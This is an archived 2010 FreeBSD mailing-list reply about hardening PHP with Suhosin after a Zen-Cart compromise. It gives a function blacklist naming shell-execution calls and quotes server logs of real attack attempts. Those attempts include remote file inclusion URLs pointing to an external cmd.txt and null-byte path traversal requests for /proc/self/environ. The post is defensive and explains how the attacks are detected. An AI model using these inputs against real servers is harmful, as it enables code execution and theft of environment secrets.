From owner-freebsd-questions@FreeBSD.ORG Mon Feb 1 17:19:50 2010 Return-Path: Delivered-To: freebsd-questions@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id D40B51065670 for ; Mon, 1 Feb 2010 17:19:50 +0000 (UTC) (envelope-from bogdan@pgn.ro) Received: from mail-bw0-f213.google.com (mail-bw0-f213.google.com [209.85.218.213]) by mx1.freebsd.org (Postfix) with ESMTP id 5929F8FC0C for ; Mon, 1 Feb 2010 17:19:49 +0000 (UTC) Received: by bwz5 with SMTP id 5so1558059bwz.3 for ; Mon, 01 Feb 2010 09:19:49 -0800 (PST) MIME-Version: 1.0 Received: by 10.204.9.151 with SMTP id l23mr871213bkl.76.1265044786566; Mon, 01 Feb 2010 09:19:46 -0800 (PST) In-Reply-To: References: Date: Mon, 1 Feb 2010 19:19:46 +0200 Message-ID: From: Bogdan Webb To: freebsd-questions@freebsd.org Content-Type: text/plain; charset=ISO-8859-1 X-Content-Filtered-By: Mailman/MimeDel 2.1.5 Subject: Re: Server compromised Zen-Cart "record company" Exploit X-BeenThere: freebsd-questions@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: User questions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 01 Feb 2010 17:19:50 -0000 Indeed it's pretty tricky with safe_mode, like for certain i know that a version of a popular r57 shell had safe_mode bypass - i was stunned to check the shell myself on my server... and i was thinking that safe_mode is enough... (+ i was using the suhoshin patch *witch in fact does nothing regarding straightening the php) then i came over suhoshin the addon (witch on my BSD with lighttpd it could be loaded only using Zen framework... for unknown reasons to me) the suhoshin was configured to blacklist some basic commands that allow php to directly run shell commands: suhosin.executor.func.blacklist = "proc_nice,shell_exec,show_source,symlink,system,dl,highlight_file,ini_alter,ini_restore,openlog,passthru,exec" thus even if hackers find bugs in some php apps it would be harder to get a shell... i say harder because it's impossible to prevent that - there are mysql ways to get shell and so on ... so it's not 100% foolproof, but it's here's some examples on how suhoshin alerts the attacks: Jan 2 02:17:00 pgn suhosin[75216]: ALERT - tried to register forbidden variable '_SERVER[DOCUMENT_ROOT]' through GET variables (attacker '91.121.75.82', file '/usr/home/wwww/pgnlinks/index.php') Dec 16 23:43:36 pgn suhosin[87560]: ALERT - function within blacklist called: shell_exec() (attacker '86.122.161.162', file '/usr/home/wwww/pvpwww/junkforum/Sources/Subs.php', line 3531) *note - these are logs from /var/log/messages and the last message is a false-positive (i thinks it's called that way) it's a basic function of SMF board to check the DNS with a linux command, but i just wanted to point out how it handles the blacklist... here's a more detailed info regarding attacks (attempts) stored in the webserver's log file (in my case lighttpd): 2010-01-19 02:21:53: (mod_fastcgi.c.2698) FastCGI-stderr: ALERT - ASCII-NUL chars not allowed within request variables - dropped variable 'list' (attacker '189.26.208.35', file '/usr/home/wwww/pgnlinks/index.php') 2010-01-19 02:21:54: (mod_fastcgi.c.2698) FastCGI-stderr: ALERT - ASCII-NUL chars not allowed within request variables - dropped variable 'c' (attacker '189.26.208.35', file '/usr/home/wwww/pgnlinks/index.php') 189.26.208.35 www.pgn.ro - [19/Jan/2010:02:20:43 +0200] "GET /index.php?list=http://www.startasurvey.com/cmd/cmd.txt? HTTP/1.1" 302 0 "-" "Mozilla/3.0 (compatible; Indy Library)" 189.26.208.35 www.pgn.ro - [19/Jan/2010:02:20:43 +0200] "GET /index.php?c= http://www.startasurvey.com/cmd/cmd.txt? HTTP/1.1" 200 3304 "-" "Mozilla/3.0 (compatible; Indy Library)" 189.26.208.35 www.pgn.ro - [19/Jan/2010:02:21:53 +0200] "GET /index.php?list=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3307 "-" "Mozilla/3.0 (compatible; Indy Library)" 189.26.208.35 www.pgn.ro - [19/Jan/2010:02:21:54 +0200] "GET /index.php?c=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3306 "-" "Mozilla/3.0 (compatible; Indy Library)" My server has safe_mode off - bcoz it's not needed (at least in my mind... i might be mistaking) and check out the phpinfo.php file i've got and see the suhoshin settings.... stay safe!